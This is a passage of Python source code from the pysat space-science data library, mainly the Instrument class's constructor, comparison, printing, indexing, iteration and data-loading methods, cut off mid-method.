# Ionosphere profiles from GPS occultation. Enable binning profile
# data using a constant step-size. Feature provided by the underlying
# COSMIC support code.
cosmic = pysat.Instrument('cosmic',
'gps',
'ionprf',
altitude_bin=3)
cosmic.download(start, stop, user=user, password=password)
cosmic.load(date=start)
# Nano-kernel functionality enables instrument objects that are
# 'set and forget'. The functions are always run whenever
# the instrument load routine is called so instrument objects may
# be passed safely to other routines and the data will always
# be processed appropriately.
# Define custom function to modify Instrument in place.
def custom_func(inst, opt_param1=False, opt_param2=False):
# perform calculations and store in new_data
inst['new_data'] = new_data
return
inst = pysat.Instrument('pysat', 'testing')
inst.custom_attach(custom_func, kwargs={'opt_param1': True})
# Custom methods are applied to data when loaded.
inst.load(date=date)
print(inst['new_data2'])
# Custom methods may also be attached at instantiation.
# Create a dictionary for each custom method and associated inputs
custom_func_1 = {'function': custom_func,
'kwargs': {'opt_param1': True}}
custom_func_2 = {'function': custom_func, 'args'=[True, False]}
custom_func_3 = {'function': custom_func, 'at_pos'=0,
'kwargs': {'opt_param2': True}}
# Combine all dicts into a list in order of application and execution,
# although this can be modified by specifying 'at_pos'. The actual
# order these functions will run is: 3, 1, 2
custom = [custom_func_1, custom_func_2, custom_func_3]
# Instantiate pysat.Instrument
inst = pysat.Instrument(platform, name, inst_id=inst_id, tag=tag,
custom=custom)
"""
# -----------------------------------------------------------------------
# Define all magic methods
def __init__(self, platform=None, name=None, tag=None, inst_id=None,
clean_level=None, update_files=None, pad=None,
orbit_info=None, inst_module=None, directory_format=None,
file_format=None, temporary_file_list=False,
strict_time_flag=True, ignore_empty_files=False,
labels={'units': ('units', str), 'name': ('long_name', str),
'notes': ('notes', str), 'desc': ('desc', str),
'min_val': ('value_min', np.float64),
'max_val': ('value_max', np.float64),
'fill_val': ('fill', np.float64)},
custom=None, **kwargs):
# Set default tag and inst_id
self.tag = tag.lower() if tag is not None else ''
self.inst_id = inst_id.lower() if inst_id is not None else ''
self.inst_module = inst_module
if self.inst_module is None:
# Use strings to look up module name
if isinstance(platform, str) and isinstance(name, str):
self.platform = platform.lower()
self.name = name.lower()
# Look to module for instrument functions and defaults
self._assign_attrs(by_name=True, tag=self.tag,
inst_id=self.inst_id)
elif (platform is None) and (name is None):
# Creating "empty" Instrument object with this path
self.name = ''
self.platform = ''
self._assign_attrs(tag=self.tag, inst_id=self.inst_id)
else:
raise ValueError(' '.join(('Inputs platform and name must both',
'be strings, or both None.')))
else:
# User has provided a module, assign platform and name here
for iattr in ['platform', 'name']:
if hasattr(self.inst_module, iattr):
setattr(self, iattr,
getattr(self.inst_module, iattr).lower())
else:
raise AttributeError(
''.join(['Supplied module {:}'.format(self.inst_module),
' is missing required attribute: ', iattr]))
# Look to supplied module for instrument functions and non-default
# attribute values
self._assign_attrs(inst_module=self.inst_module,
tag=self.tag, inst_id=self.inst_id)
# More reasonable defaults for optional parameters
self.clean_level = (clean_level.lower() if clean_level is not None
else pysat.params['clean_level'])
# Assign strict_time_flag
self.strict_time_flag = strict_time_flag
# Assign directory format information, which tells pysat how to look in
# sub-directories for files.
if directory_format is not None:
# assign_func sets some instrument defaults, but user inputs
# take precedence
self.directory_format = directory_format
# The value provided by the user or the Instrument may be either
# a string or a function
if self.directory_format is not None:
if callable(self.directory_format):
self.directory_format = self.directory_format(tag, inst_id)
else:
# Value not provided by user or developer. Use stored value.
self.directory_format = pysat.params['directory_format']
# Assign the file format string, if provided by user. This enables
# users to temporarily put in a new string template for files that may
# not match the standard names obtained from the download routine.
if file_format is not None:
self.file_format = file_format
# Check to make sure value is reasonable
if self.file_format is not None:
# Check if it is an iterable string. If it isn't formatted
# properly, raise a ValueError
if(not isinstance(self.file_format, str)
or (self.file_format.find("{") < 0)
or (self.file_format.find("}") < 0)):
raise ValueError(''.join(['file format set to default, ',
'supplied string must be iterable ',
'[{:}]'.format(self.file_format)]))
# set up empty data and metadata
# check if pandas or xarray format
if self.pandas_format:
self._null_data = pds.DataFrame(None)
self._data_library = pds.DataFrame
else:
self._null_data = xr.Dataset(None)
self._data_library = xr.Dataset
# assign null data for user selected data type
self.data = self._null_data.copy()
# Create Meta instance with appropriate labels. Meta class methods will
# use Instrument definition of MetaLabels over the Metadata declaration
self.meta_labels = labels
self.meta = pysat.Meta(labels=self.meta_labels)
self.meta.mutable = False
# Nano-kernel processing variables. Feature processes data on each load.
self.custom_functions = []
self.custom_args = []
self.custom_kwargs = []
# Process provided user input for custom methods, if provided.
if custom is not None:
# Required keys.
req_key = 'function'
for cust in custom:
# Check if required keys present in input.
if req_key not in cust:
estr = ''.join(('Input dict to custom is missing the ',
'required key: ', req_key))
raise ValueError(estr)
# Set the custom kwargs
cust_kwargs = dict()
for ckey in cust.keys():
if ckey != req_key:
cust_kwargs[ckey] = cust[ckey]
# Inputs have been checked, add to Instrument object.
self.custom_attach(cust['function'], **cust_kwargs)
# Create arrays to store data around loaded day. This enables padding
# across day breaks with minimal loads
self._next_data = self._null_data.copy()
self._next_data_track = []
self._prev_data = self._null_data.copy()
self._prev_data_track = []
self._curr_data = self._null_data.copy()
# Initialize the padding
if isinstance(pad, (dt.timedelta, pds.DateOffset)) or pad is None:
self.pad = pad
elif isinstance(pad, dict):
self.pad = pds.DateOffset(**pad)
else:
raise ValueError(' '.join(['pad must be a dict, NoneType,',
'datetime.timedelta, or',
'pandas.DateOffset instance.']))
# Store kwargs, passed to standard routines first
self.kwargs = {}
self.kwargs_supported = {}
self.kwargs_reserved = _reserved_keywords.copy()
saved_keys = []
# Expected function keywords
exp_keys = ['list_files', 'load', 'preprocess', 'download',
'list_remote_files', 'clean', 'init']
for fkey in exp_keys:
func_name = _kwargs_keys_to_func_name(fkey)
func = getattr(self, func_name)
# Get dict of supported keywords and values
default_kwargs = _get_supported_keywords(func)
# Confirm there are no reserved keywords present
for kwarg in kwargs.keys():
if kwarg in self.kwargs_reserved:
estr = ''.join(('Reserved keyword "', kwarg, '" is not ',
'allowed at instantiation.'))
raise ValueError(estr)
# Check if kwargs are in list
good_kwargs = [ckey for ckey in kwargs.keys()
if ckey in default_kwargs]
# Store appropriate user supplied keywords for this function
self.kwargs[fkey] = {gkey: kwargs[gkey] for gkey in good_kwargs}
# Store all supported keywords for user edification
self.kwargs_supported[fkey] = default_kwargs
# Store keys to support check that all user supplied
# keys are used.
saved_keys.extend(default_kwargs.keys())
# Test for user supplied keys that are not used
missing_keys = []
for custom_key in kwargs:
if custom_key not in saved_keys and (custom_key not in exp_keys):
missing_keys.append(custom_key)
if len(missing_keys) > 0:
raise ValueError('unknown keyword{:s} supplied: {:}'.format(
'' if len(missing_keys) == 1 else 's', missing_keys))
# Instantiate the Files class
temporary_file_list = not temporary_file_list
if ignore_empty_files is None:
ignore_empty_files = pysat.params['ignore_empty_files']
if update_files is None:
update_files = pysat.params['update_files']
self.files = pysat.Files(self, directory_format=self.directory_format,
update_files=update_files,
file_format=self.file_format,
write_to_disk=temporary_file_list,
ignore_empty_files=ignore_empty_files)
# Set bounds for iteration. self.bounds requires the Files class, and
# setting bounds to (None, None) loads the default bounds.
self.bounds = (None, None)
self.date = None
self._fid = None
self.yr = None
self.doy = None
self._load_by_date = False
# Initialize orbit support
if orbit_info is None:
if self.orbit_info is None:
# If default info not provided, use class defaults
self.orbit_info = dict()
else:
self.orbit_info = orbit_info
self.orbits = pysat.Orbits(self, **self.orbit_info)
# Create empty placeholder for the meta translation table, which
# provides information about how to label metadata for netcdf export.
# If None, pysat metadata labels will be used instead.
self._meta_translation_table = None
# Create a placeholder for a post-processing function to be applied
# to the metadata dictionary before export. If None, no post-processing
# will occur
self._export_meta_post_processing = None
# Start with a daily increment for loading
self.load_step = dt.timedelta(days=1)
# Run instrument init function, a basic pass function is used if the
# user doesn't supply the init function
self._init_rtn(**self.kwargs['init'])
# Store base attributes, used in particular by Meta class
self._base_attr = dir(self)
def __eq__(self, other):
"""Perform equality check
Parameters
----------
other : any
Other object to compare for equality
Returns
-------
bool
True if objects are identical, False if they are not.
"""
# Check if other is the same class (Instrument). Exit early if not.
if not isinstance(other, self.__class__):
return False
# Check if both objects are the same data type. Exit early if not.
if self.pandas_format != other.pandas_format:
return False
# Both the same data type, do both have data?
if self.empty and other.empty:
# This check needed to establish next check
pass
elif self.empty or other.empty:
# Only one has data, exit early.
return False
# If data is the same, check other attributes. Partial functions
# required their own path for equality, string comparisons!
partial_funcs = ['_init_rtn', '_clean_rtn', '_preprocess_rtn',
'_list_files_rtn', '_download_rtn',
'_list_remote_files_rtn', '_load_rtn']
# If the type is the same then check everything that is attached to
# the Instrument object. Includes attributes, methods, variables, etc.
checks = []
key_check = []
for key in self.__dict__.keys():
if key not in ['data', '_null_data', '_next_data',
'_curr_data', '_prev_data']:
key_check.append(key)
if key in other.__dict__.keys():
if key in partial_funcs:
# Partial function comparison doesn't work directly.
try:
checks.append(str(self.__dict__[key])
== str(other.__dict__[key]))
except AttributeError:
# If an item missing a required attribute
return False
else:
# General check for everything else.
checks.append(np.all(self.__dict__[key]
== other.__dict__[key]))
else:
# Both objects don't have the same attached objects
return False
else:
# Data comparison area. Established earlier both have data.
if self.pandas_format:
try:
# Check is sensitive to the index labels. Errors
# if index is not identical.
checks.append(np.all(self.__dict__[key]
== other.__dict__[key]))
except ValueError:
return False
else:
checks.append(xr.Dataset.equals(self.data,
other.data))
# Confirm that other Instrument object doesn't have extra terms
for key in other.__dict__.keys():
if key not in self.__dict__.keys():
return False
# Confirm all checks are True
test_data = np.all(checks)
return test_data
def __repr__(self):
""" Print the basic Instrument properties"""
# Create string for custom attached methods
cstr = '['
for func, arg, kwarg in zip(self.custom_functions, self.custom_args,
self.custom_kwargs):
tstr = "".join(("'function': {sfunc}, 'args': {sargs}, ",
"'kwargs': {kargs}"))
tstr = tstr.format(sfunc=repr(func), sargs=repr(arg),
kargs=repr(kwarg))
cstr = "".join((cstr, '{', tstr, '}, '))
cstr += ']'
# Deconstruct the kwargs
in_kwargs = dict()
for sort_key in self.kwargs.keys():
for meth_key in self.kwargs[sort_key]:
in_kwargs[meth_key] = self.kwargs[sort_key][meth_key]
# Get the inst_module string
if self.inst_module is None:
istr = "None"
else:
istr = getattr(self.inst_module, "__name__")
# Create string for other parts Instrument instantiation
out_str = "".join(["pysat.Instrument(platform='", self.platform,
"', name='", self.name, "', tag='", self.tag,
"', inst_id='", self.inst_id,
"', clean_level='", self.clean_level,
"', pad={:}, orbit_info=".format(self.pad),
"{:}, ".format(self.orbit_info),
"inst_module=", istr, ", custom=", cstr,
", **{:}".format(in_kwargs), ")"])
return out_str
def __str__(self):
""" Descriptively print the basic Instrument properties"""
# Get the basic Instrument properties
output_str = 'pysat Instrument object\n'
output_str += '-----------------------\n'
output_str += "Platform: '{:s}'\n".format(self.platform)
output_str += "Name: '{:s}'\n".format(self.name)
output_str += "Tag: '{:s}'\n".format(self.tag)
output_str += "Instrument id: '{:s}'\n".format(self.inst_id)
# Print out the data processing information
output_str += '\nData Processing\n'
output_str += '---------------\n'
output_str += "Cleaning Level: '{:s}'\n".format(self.clean_level)
output_str += 'Data Padding: {:s}\n'.format(self.pad.__str__())
for routine in self.kwargs.keys():
output_str += 'Keyword Arguments Passed to {:s}: '.format(routine)
output_str += "{:s}\n".format(self.kwargs[routine].__str__())
num_funcs = len(self.custom_functions)
output_str += "Custom Functions: {:d} applied\n".format(num_funcs)
if num_funcs > 0:
for i, func in enumerate(self.custom_functions):
output_str += " {:d}: {:}\n".format(i, func.__repr__())
if len(self.custom_args[i]) > 0:
ostr = " : Args={:}\n".format(self.custom_args[i])
output_str += ostr
if len(self.custom_kwargs[i]) > 0:
ostr = " : Kwargs={:}\n".format(self.custom_kwargs[i])
output_str += ostr
output_str += '\n'
# Print out the orbit settings
if self.orbits.orbit_index is not None:
output_str += '{:s}\n'.format(self.orbits.__str__())
# Print the local file information
output_str += self.files.__str__()
# Display loaded data
output_str += '\n\nLoaded Data Statistics\n'
output_str += '----------------------\n'
if not self.empty:
output_str += 'Date: ' + self.date.strftime('%d %B %Y') + '\n'
output_str += 'DOY: {:03d}\n'.format(self.doy)
output_str += 'Time range: '
output_str += self.index[0].strftime('%d %B %Y %H:%M:%S')
output_str += ' --- '
output_str += self.index[-1].strftime('%d %B %Y %H:%M:%S\n')
output_str += 'Number of Times: {:d}\n'.format(len(self.index))
output_str += 'Number of variables: {:d}\n'.format(
len(self.variables))
output_str += '\nVariable Names:\n'
output_str += utils._core.fmt_output_in_cols(self.variables)
# Print the short version of the metadata
output_str += '\n{:s}'.format(self.meta.__str__(long_str=False))
else:
output_str += 'No loaded data.\n'
return output_str
def __getitem__(self, key):
"""
Convenience notation for accessing data; inst['name'] is inst.data.name
Parameters
----------
key : str, tuple, or dict
Data variable name, tuple with a slice, or dict used to locate
desired data
Note
----
See pandas or xarray .loc and .iloc documentation for more details
Examples
--------
::
# By name
inst['name']
# By list of names
inst[['name1', 'name2']]
# By position
inst[row_index, 'name']
# Slicing by row
inst[row1:row2, 'name']
# By Date
inst[datetime, 'name']
# Slicing by date, inclusive
inst[datetime1:datetime2, 'name']
# Slicing by name and row/date
inst[datetime1:datetime2, 'name1':'name2']
"""
if self.pandas_format:
if isinstance(key, str):
return self.data[key]
elif isinstance(key, tuple):
try:
# Pass keys directly through
return self.data.loc[key[0], key[1]]
except (KeyError, TypeError) as err1:
# TypeError for single integer
# KeyError for list, array, slice of integers
# Assume key[0] is integer (including list or slice)
try:
return self.data.loc[self.data.index[key[0]], key[1]]
except IndexError as err2:
err_message = '\n'.join(("original messages:",
str(err1), str(err2)))
raise ValueError(' '.join(("Check requested indexes,",
"data may not exist.",
err_message)))
else:
try:
# integer based indexing
return self.data.iloc[key]
except (TypeError, ValueError):
# If it's not an integer, TypeError is thrown
# If it's a list, ValueError is thrown
return self.data[key]
else:
return self.__getitem_xarray__(key)
def __getitem_xarray__(self, key):
"""
Convenience notation for accessing data; inst['name'] is inst.data.name
Parameters
----------
key : str, tuple, or dict
Data variable name, tuple with a slice, or dict used to locate
desired data
Returns
-------
xr.Dataset
Dataset of with only the desired values
Note
----
See xarray .loc and .iloc documentation for more details
Examples
--------
::
# By name
inst['name']
# By position
inst[row_index, 'name']
# Slicing by row
inst[row1:row2, 'name']
# By Date
inst[datetime, 'name']
# Slicing by date, inclusive
inst[datetime1:datetime2, 'name']
# Slicing by name and row/date
inst[datetime1:datetime2, 'name1':'name2']
"""
if 'Epoch' in self.data.indexes:
epoch_name = 'Epoch'
elif 'time' in self.data.indexes:
epoch_name = 'time'
else:
return xr.Dataset(None)
if isinstance(key, tuple):
if len(key) == 2:
# Support slicing time, variable name
try:
return self.data.isel(indexers={epoch_name: key[0]})[key[1]]
except (TypeError, KeyError):
try:
return self.data.sel(indexers={epoch_name:
key[0]})[key[1]]
except TypeError:
# Construct dataset from names
return self.data[self.variables[key[1]]]
except ValueError as verr:
# This may be multidimensional indexing, where the mutliple
# dimensions are contained within an iterable object
var_name = key[-1]
# If this is not true, raise the original error
if len(key[0]) != len(self[var_name].dims):
raise ValueError(verr)
# Construct a dictionary with dimensions as keys and the
# indexes to select for each dimension as values
indict = dict()
for i, dim in enumerate(self[var_name].dims):
indict[dim] = key[0][i]
return self.data[var_name][indict]
else:
# Multidimensional indexing where the multple dimensions are
# not contained within another object
var_name = key[-1]
# Ensure the dimensions are appropriate
if len(key) - 1 != len(self[var_name].dims):
raise ValueError("indices don't match data dimensions")
# Construct a dictionary with dimensions as keys and the
# indexes to select for each dimension as values
indict = dict()
for i, dim in enumerate(self[var_name].dims):
indict[dim] = key[i]
return self.data[var_name][indict]
else:
try:
# Grab a particular variable by name
return self.data[key]
except (TypeError, KeyError):
# If that didn't work, likely need to use `isel` or `sel`
try:
# Try to get all data variables, but for a subset of time
# using integer indexing
return self.data.isel(indexers={epoch_name: key})
except (TypeError, KeyError):
# Try to get a subset of time, using label based indexing
return self.data.sel(indexers={epoch_name: key})
def __setitem__(self, key, new):
"""Convenience method for adding data to instrument.
Parameters
----------
key : str, tuple, dict
String label, or dict or tuple of indices for new data
new : dict, pandas.DataFrame, or xarray.Dataset
New data as a dict (assigned with key 'data'), DataFrame, or
Dataset
Examples
--------
::
# Simple Assignment, default metadata assigned
# 'long_name' = 'name'
# 'units' = ''
inst['name'] = newData
# Assignment with Metadata
inst['name'] = {'data':new_data,
'long_name':long_name,
'units':units}
Note
----
If no metadata provided and if metadata for 'name' not already stored
then default meta information is also added,
long_name = 'name', and units = ''.
"""
# add data to main pandas.DataFrame, depending upon the input
# aka slice, and a name
if self.pandas_format:
if isinstance(key, tuple):
try:
# Pass directly through to loc
# This line raises a FutureWarning if key[0] is a slice
# The future behavior is TypeError, which is already
# handled correctly below
self.data.loc[key[0], key[1]] = new
except (KeyError, TypeError):
# TypeError for single integer, slice (pandas 2.0)
# KeyError for list, array
# Assume key[0] is integer (including list or slice)
self.data.loc[self.data.index[key[0]], key[1]] = new
self.meta[key[1]] = {}
return
elif not isinstance(new, dict):
# make it a dict to simplify downstream processing
new = {'data': new}
# input dict must have data in 'data',
# the rest of the keys are presumed to be metadata
in_data = new.pop('data')
if hasattr(in_data, '__iter__'):
if isinstance(in_data, pds.DataFrame):
pass
# filter for elif
elif isinstance(next(iter(in_data), None), pds.DataFrame):
# Input is a list_like of frames, denoting higher order data
if ('meta' not in new) and (key not in self.meta.keys_nD()):
# Create an empty Meta instance but with variable names.
# This will ensure the correct defaults for all
# subvariables. Meta can filter out empty metadata as
# needed, the check above reduces the need to create
# Meta instances
ho_meta = pysat.Meta(labels=self.meta_labels)
ho_meta[in_data[0].columns] = {}
self.meta[key] = ho_meta
# assign data and any extra metadata
self.data[key] = in_data
self.meta[key] = new
else:
# xarray format chosen for Instrument object
if not isinstance(new, dict):
new = {'data': new}
in_data = new.pop('data')
if 'Epoch' in self.data.indexes:
epoch_name = 'Epoch'
elif 'time' in self.data.indexes:
epoch_name = 'time'
else:
raise ValueError(' '.join(('Unsupported time index name,',
'"Epoch" or "time".')))
if isinstance(key, tuple):
# user provided more than one thing in assignment location
# something like, index integers and a variable name
# self[idx, 'variable'] = stuff
# or, self[idx1, idx2, idx3, 'variable'] = stuff
# construct dictionary of dimensions and locations for
# xarray standards
indict = {}
for i, dim in enumerate(self[key[-1]].dims):
indict[dim] = key[i]
try:
# Try loading as values
self.data[key[-1]].loc[indict] = in_data
except (TypeError, KeyError):
# Try loading indexed as integers
self.data[key[-1]][indict] = in_data
self.meta[key[-1]] = new
return
elif isinstance(key, str):
# Assigning basic variables
if isinstance(in_data, xr.DataArray):
# If xarray input, take as is
self.data[key] = in_data
elif len(np.shape(in_data)) == 1:
# If not an xarray input, but still iterable, then we
# go through to process the 1D input
if len(in_data) == len(self.index):
# 1D input has the correct length for storage along
# 'Epoch'
self.data[key] = (epoch_name, in_data)
elif len(in_data) == 1:
# only provided a single number in iterable, make that
# the input for all times
self.data[key] = (epoch_name,
[in_data[0]] * len(self.index))
elif len(in_data) == 0:
# Provided an empty iterable, make everything NaN
self.data[key] = (epoch_name,
[np.nan] * len(self.index))
elif len(np.shape(in_data)) == 0:
# Not an iterable input, rather a single number. Make
# that number the input for all times
self.data[key] = (epoch_name, [in_data] * len(self.index))
else:
# Multidimensional input that is not an xarray. The user
# needs to provide everything that is required for success
if isinstance(in_data, tuple):
self.data[key] = in_data
else:
raise ValueError(' '.join(('Must provide dimensions',
'for xarray multidim',
'data using input tuple.')))
elif hasattr(key, '__iter__'):
# Multiple input strings (keys) are provided, but not in tuple
# form. Recurse back into this function, setting each input
# individually
for keyname in key:
self.data[keyname] = in_data[keyname]
# Attach metadata
self.meta[key] = new
return
def __iter__(self):
"""Iterates instrument object by loading subsequent days or files.
Note
----
Limits of iteration, and iteration type (date/file)
set by `bounds` attribute.
Default bounds are the first and last dates from files on local system.
Examples
--------
::
inst = pysat.Instrument(platform=platform, name=name, tag=tag)
start = dt.datetime(2009, 1, 1)
stop = dt.datetime(2009, 1, 31)
inst.bounds = (start, stop)
for inst in inst:
print('Another day loaded', inst.date)
"""
if self._iter_type == 'file':
width = self._iter_width
for fname in self._iter_list:
# Without a copy, a = [inst for inst in inst] leads to
# every item being the last day loaded.
# With the copy, behavior is as expected. Making a copy
# of an empty object is going to be faster than a full one.
self.data = self._null_data
local_inst = self.copy()
# load range of files
# get location for second file, width of 1 loads only one file
nfid = self.files.get_index(fname) + width - 1
local_inst.load(fname=fname, stop_fname=self.files[nfid])
yield local_inst
elif self._iter_type == 'date':
# Iterate over dates. A list of dates is generated whenever
# bounds are set
for date in self._iter_list:
# Use a copy trick, starting with null data in object
self.data = self._null_data
local_inst = self.copy()
# Set the user-specified range of dates
end_date = date + self._iter_width
# Load the range of dates
local_inst.load(date=date, end_date=end_date)
yield local_inst
# Add last loaded data/metadata from local_inst into the original object
# Making copy here to ensure there are no left over references
# to the local_inst object in the loop that would interfere with
# garbage collection. Don't want to make a copy of underlying data.
local_inst_data = local_inst.data
local_inst.data = local_inst._null_data
self.data = local_inst_data
self.meta = local_inst.meta.copy()
# -----------------------------------------------------------------------
# Define all hidden methods
def _empty(self, data=None):
"""Boolean flag reflecting lack of data
Parameters
----------
data : NoneType, pds.DataFrame, or xr.Dataset
Data object
Returns
-------
bool
True if there is no Instrument data, False if there is data
"""
if data is None:
data = self.data
if self.pandas_format:
return data.empty
else:
if 'time' in data.indexes:
return len(data.indexes['time']) == 0
elif 'Epoch' in data.indexes:
return len(data.indexes['Epoch']) == 0
else:
return True
def _index(self, data=None):
"""Returns time index of loaded data
Parameters
----------
data : NoneType, pds.DataFrame, or xr.Dataset
Data object
Returns
-------
pds.Series
Series containing the time indeces for the Instrument data
"""
if data is None:
data = self.data
if self.pandas_format:
return data.index
else:
if 'time' in data.indexes:
return data.indexes['time']
elif 'Epoch' in data.indexes:
return data.indexes['Epoch']
else:
return pds.Index([])
def _pass_method(*args, **kwargs):
""" Default method for updatable Instrument methods
"""
pass
def _assign_attrs(self, by_name=False, inst_module=None, tag=None,
inst_id=None):
"""Assign all external instrument attributes to the Instrument object
Parameters
----------
by_name : boolean
If True, uses self.platform and self.name to load the Instrument,
if False uses inst_module. (default=False)
inst_module : module or NoneType
Instrument module or None, if not specified (default=None)
tag : str or NoneType
Instrument tag string
inst_id : str or NoneType
Instrument inst_id string
Raises
------
KeyError
If unknown platform or name supplied
ImportError
If there was an error importing the instrument module
AttributeError
If a required Instrument method is missing
Note
----
methods
init, preprocess, and clean
functions
load, list_files, download, and list_remote_files
attributes
directory_format, file_format, multi_file_day, orbit_info, and
pandas_format
test attributes
_download_test, _download_test_travis, and _password_req
"""
# Declare the standard Instrument methods and attributes
inst_methods = {'required': ['init', 'clean'],
'optional': ['preprocess']}
inst_funcs = {'required': ['load', 'list_files', 'download'],
'optional': ['list_remote_files']}
inst_attrs = {'directory_format': None, 'file_format': None,
'multi_file_day': False, 'orbit_info': None,
'pandas_format': True}
test_attrs = {'_test_download': True, '_test_download_travis': True,
'_password_req': False}
# Set method defaults
for mname in [mm for val in inst_methods.values() for mm in val]:
local_name = _kwargs_keys_to_func_name(mname)
setattr(self, local_name, self._pass_method)
# Set function defaults
for mname in [mm for val in inst_funcs.values() for mm in val]:
local_name = _kwargs_keys_to_func_name(mname)
setattr(self, local_name, _pass_func)
# Set attribute defaults
for iattr in inst_attrs.keys():
setattr(self, iattr, inst_attrs[iattr])
# Set test defaults
for iattr in test_attrs.keys():
setattr(self, iattr, test_attrs[iattr])
# Get the instrument module information, returning with defaults
# if none is supplied
if by_name:
# pysat platform is reserved for modules within pysat.instruments
if self.platform == 'pysat':
# Look within pysat
inst = importlib.import_module(
''.join(('.', self.platform, '_', self.name)),
package='pysat.instruments')
else:
# Not a native pysat.Instrument. First, get the supporting
# instrument module from the pysat registry.
user_modules = pysat.params['user_modules']
if self.platform not in user_modules.keys():
raise KeyError('unknown platform supplied: {:}'.format(
self.platform))
if self.name not in user_modules[self.platform].keys():
raise KeyError(''.join(['unknown name supplied: ',
self.name, ' not assigned to the ',
self.platform, ' platform']))
mod = user_modules[self.platform][self.name]
# Import the registered module. Though modules are checked to
# ensure they may be imported when registered, something may
# have changed on the system since it was originally checked.
try:
inst = importlib.import_module(mod)
except ImportError as ierr:
estr = ' '.join(('unable to locate or import module for',
'platform {:}, name {:}'))
estr = estr.format(self.platform, self.name)
logger.error(estr)
raise ImportError(ierr)
elif inst_module is not None:
# User supplied an object with relevant instrument routines
inst = inst_module
else:
# No module or name info, default pass functions assigned
return
# Check if tag and inst_id are appropriate for the module
if inst_id not in inst.inst_ids.keys():
inst_id_str = ', '.join([ikey.__repr__()
for ikey in inst.inst_ids.keys()])
estr = ''.join(("'", inst_id, "' is not one of the supported ",
'inst_ids. Supported inst_ids are: ',
inst_id_str, '.'))
raise ValueError(estr)
if tag not in inst.inst_ids[inst_id]:
tag_str = ', '.join([tkey.__repr__()
for tkey in inst.inst_ids[inst_id]])
estr = ''.join(("'", tag, "' is not one of the supported tags. ",
'Supported tags are: ', tag_str, '.'))
raise ValueError(estr)
# Assign the Instrument methods
missing = list()
for mstat in inst_methods.keys():
for mname in inst_methods[mstat]:
if hasattr(inst, mname):
local_name = _kwargs_keys_to_func_name(mname)
# Remote functions are not attached as methods unless
# cast that way, specifically
# https://stackoverflow.com/questions/972/
# adding-a-method-to-an-existing-object-instance
local_method = types.MethodType(getattr(inst, mname), self)
setattr(self, local_name, local_method)
else:
missing.append(mname)
if mstat == "required":
raise AttributeError(
"".join(['A `', mname, '` method is required',
' for every Instrument']))
if len(missing) > 0:
logger.debug('Missing Instrument methods: {:}'.format(missing))
# Assign the Instrument functions
missing = list()
for mstat in inst_funcs.keys():
for mname in inst_funcs[mstat]:
if hasattr(inst, mname):
local_name = _kwargs_keys_to_func_name(mname)
setattr(self, local_name, getattr(inst, mname))
else:
missing.append(mname)
if mstat == "required":
raise AttributeError(
"".join(['A `', mname, '` function is required',
' for every Instrument']))
if len(missing) > 0:
logger.debug('Missing Instrument methods: {:}'.format(missing))
# Look for instrument default parameters
missing = list()
for iattr in inst_attrs.keys():
if hasattr(inst, iattr):
setattr(self, iattr, getattr(inst, iattr))
else:
missing.append(iattr)
if len(missing) > 0:
logger.debug(''.join(['These Instrument attributes kept their ',
'default values: {:}'.format(missing)]))
# Check for download flags for tests
missing = list()
for iattr in test_attrs.keys():
# Check and see if this instrument has the desired test flag
if hasattr(inst, iattr):
local_attr = getattr(inst, iattr)
# Test to see that this attribute is set for the desired
# inst_id and tag
if self.inst_id in local_attr.keys():
if self.tag in local_attr[self.inst_id].keys():
# Update the test attribute value
setattr(self, iattr, local_attr[self.inst_id][self.tag])
else:
missing.append(iattr)
else:
missing.append(iattr)
else:
missing.append(iattr)
if len(missing) > 0:
logger.debug(''.join(['These Instrument test attributes kept their',
' default values: {:}'.format(missing)]))
return
def _load_data(self, date=None, fid=None, inc=None, load_kwargs=None):
"""
Load data for an instrument on given date or fid, depending upon input.
Parameters
----------
date : dt.datetime or NoneType
file date (default=None)
fid : int or NoneType
filename index value (default=None)
inc : dt.timedelta or int
Increment of files or dates to load, starting from the
root date or fid (default=None)
load_kwargs : dict
Dictionary of keywords that may be options for specific instruments.
If None, uses `self.kwargs['load']`. (default=None)
Returns
-------
data : pds.DataFrame or xr.Dataset
pysat data
meta : pysat.Meta
pysat meta data
"""
# Set default load_kwargs
if load_kwargs is None:
load_kwargs = self.kwargs['load']
date = utils.time.filter_datetime_input(date)
if fid is not None:
# get filename based off of index value
# inclusive loading on filenames
fname = self.files[fid:(fid + inc + 1)]
elif date is not None:
fname = self.files[date:(date + inc)]
else:
raise ValueError('Must supply either a date or file id number.')
if len(fname) > 0:
load_fname = [os.path.join(self.files.data_path, f) for f in fname]
try:
data, mdata = self._load_rtn(load_fname, tag=self.tag,
inst_id=self.inst_id,
**load_kwargs)
# ensure units and name are named consistently in new Meta
# object as specified by user upon Instrument instantiation
mdata.accept_default_labels(self.meta)
bad_datetime = False
except pds.errors.OutOfBoundsDatetime:
bad_datetime = True
data = self._null_data.copy()
mdata = pysat.Meta(labels=self.meta_labels)
else:
bad_datetime = False
data = self._null_data.copy()
mdata = pysat.Meta(labels=self.meta_labels)
output_str = '{platform} {name} {tag} {inst_id}'
output_str = output_str.format(platform=self.platform,
name=self.name, tag=self.tag,
inst_id=self.inst_id)
# Check that data and metadata are the data types we expect
if not isinstance(data, self._data_library):
raise TypeError(' '.join(('Data returned by instrument load',
'routine must be a', self._data_library)))
if not isinstance(mdata, pysat.Meta):
raise TypeError('Metadata returned must be a pysat.Meta object')
# Let user know whether or not data was returned
ind = data.index if self.pandas_format else data.indexes
if len(ind) > 0:
if date is not None:
output_str = ' '.join(('Returning', output_str, 'data for',
date.strftime('%d %B %Y')))
else:
if len(fname) == 1:
# this check was zero
output_str = ' '.join(('Returning', output_str,
'data from', fname[0]))
else:
output_str = ' '.join(('Returning', output_str,
'data from', fname[0], '::',
fname[-1]))
else:
# no data signal
if date is not None:
if bad_datetime:
output_str = ' '.join(('Bad datetime for', output_str,
date.strftime('%d %B %Y')))
else:
output_str = ' '.join(('No', output_str, 'data for',
date.strftime('%d %B %Y')))
else:
if len(fname) == 1:
output_str = ' '.join(('No', output_str, 'data for',
fname[0]))
elif len(fname) == 0:
output_str = ' '.join(('No', output_str, 'valid',
'filenames found'))
else:
output_str = ' '.join(('No', output_str, 'data for',
fname[0], '::',
fname[-1]))
# Remove extra spaces, if any are present
output_str = " ".join(output_str.split())
logger.info(output_str)
return data, mdata
def _load_next(self):
"""Load the next days data (or file) without incrementing the date
Returns
-------
data : (pds.DataFrame or xr.Dataset)
pysat data
meta : (pysat.Meta)
pysat meta data
Note
----
Repeated calls will not advance date/file and will produce the same
data.
Uses info stored in object to either increment the date,
or the file. Looks for self._load_by_date flag.
"""
if self._load_by_date:
